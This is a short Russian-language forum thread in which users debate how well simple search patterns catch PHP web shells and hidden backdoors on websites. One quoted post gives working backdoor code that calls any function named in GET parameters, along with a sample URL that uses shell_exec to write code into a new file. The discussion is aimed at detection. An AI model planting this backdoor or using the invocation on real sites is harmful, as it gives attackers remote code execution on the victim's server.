Цитата:
Сообщение от Morgul
Alexsize, ну что ты тут рассказываешь, а? если шеллы еще можно найти более-менее, то хитрые бэкдоры, где нет ни единого eval, компрессии и прочего - дохрена и еще чуть-чуть.
|
Да все можно запрятать, кто спорит? И в базе юзеров незаметно добавить,права поменять и тд.
НО =)
Кому оно нахрен нужно..
Все что я у себя вылавливал - ищется вон теми строчками.
А остальное ручками, логи смотреть, даты палить, если уж совсем заипут, перенастраивать сервак.
Еще раз повторюсь и я в этом убежден - те строчки 90% шеллов отловят.
А универсального софта и способа отлова, как и кнопки БАБЛО, не существует.
Цитата:
Сообщение от editeur
Тяжело будет найти такой бэкдор:
Код:
$fun = $_GET["fun"];
$name = $_GET["name"];
$param = $_GET["param"];
if ($fun) {
$fun($name, $param);
}
вызывается например так
Код:
site.com/index.php?fun=call_user_func&name=shell_exec¶m=echo some evil code > huy.php
Это так, первое что в голову пришло
|
Очень тяжело, меньше минуты в логах искать буду =)
Цитата:
Сообщение от masolit
так и есть ) бывают шеллы вообще без единой функции ) просто типа набор слов рандомных ) их даже sucuri не находит
|
Бывают, видел, но на практике не встречал =)
Скинь код в ЛС, затесчу, если интересно.
Попробую традиционным способом найти =)